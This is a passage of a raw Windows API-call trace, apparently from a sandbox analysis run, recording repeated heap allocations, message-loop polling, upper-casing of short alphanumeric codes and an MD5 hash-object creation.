Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.670] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.671] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.671] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0266.671] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.671] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0266.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.672] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.672] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.673] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.673] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.673] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.673] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.674] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.674] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.675] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0266.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.676] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0266.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.677] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.677] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.678] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.678] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.678] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.679] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.679] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.679] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.680] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.680] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.680] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.681] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.681] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.681] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.681] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.682] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.682] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.683] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.683] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.683] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.684] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.684] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.684] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.685] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.685] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.685] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.686] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.686] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.687] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 